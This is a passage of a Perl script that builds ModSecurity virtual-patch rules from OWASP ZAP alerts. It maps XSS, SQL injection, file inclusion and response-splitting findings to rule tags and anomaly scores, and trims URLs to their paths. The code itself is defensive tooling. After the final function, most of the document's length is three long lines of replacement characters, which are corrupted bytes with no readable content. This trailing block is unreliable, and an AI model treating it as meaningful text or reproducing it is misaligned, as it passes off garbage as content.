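        print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uri\n# Vulnerable Parameter: $param_name\n#\n".$rule."\n\n";
        # Report the type that was actually handled; several branches used
        # to print the name of a different class here.
        print "$type (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
        $num_rules_generated++;
    }
}

# Picks tags, TX class and score variables for the alert type and writes the
# rule(s) through write_rules.
sub generate_patch {
    my($type,$uricontent,@params) = @_;
    # NOTE(review): the id is "1" followed by the alert index, so generated
    # ids are small numbers; check them against ids already in use.
    my $id = "1".$vuln_count;
    my $score = "setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}";
    my $sqli_tags = "tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2'";
    my $sqli_score = "setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},".$score;

    switch($type) {
        case ($VULN_CLASS_XSS) {
            write_rules($type,$id,$uricontent,\@params,"XSS",
                "tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1'",
                "setvar:tx.xss_score=+%{tx.critical_anomaly_score},".$score);
        }
        case ($VULN_CLASS_SQLI) {
            write_rules($type,$id,$uricontent,\@params,"SQL_INJECTION",$sqli_tags,$sqli_score);
        }
        # This branch used to test a variable that is never set in this
        # script, so "SQL Injection Fingerprinting" alerts were accepted as
        # supported but never produced a rule.
        case ($VULN_CLASS_SQLI_FINGERPRINT) {
            write_rules($type,$id,$uricontent,\@params,"SQL_INJECTION",$sqli_tags,$sqli_score);
        }
        case ($VULN_CLASS_LFI) {
            write_rules($type,$id,$uricontent,\@params,"LFI",
                "tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33'",$score);
        }
        case ($VULN_CLASS_RFI) {
            write_rules($type,$id,$uricontent,\@params,"RFI",
                "tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05'",$score);
        }
        case ($VULN_CLASS_HTTPRS) {
            write_rules($type,$id,$uricontent,\@params,"RESPONSE_SPLITTING",
                "tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25'",$score);
        }
    }
}

# Returns the path part of $url: scheme and host are cut off the front and
# everything from the first question mark on is dropped.
sub get_uricontent {
    my($url) = @_;
    # http and https; with http only, an https URL stayed whole and the
    # generated REQUEST_FILENAME pattern could never match a request.
    my $regex = "https?:\/\/+[a-zA-Z0-9.:-]*\/";

    # First, trim the scheme and host part out of the URL. $& is only valid
    # after a successful match, so it is read inside the if.
    if($url =~ /$regex/){
        substr($url,index($url,$&),length($&)) = "";
    }

    # If the URL contains a php or cgi query with
    # one or more params and values, trim those out.
    # Trim from the question mark to the end.
    if($url =~ /\?/){
        substr($url,index($url,"?")) = "";
    }
    return $url;
}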
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������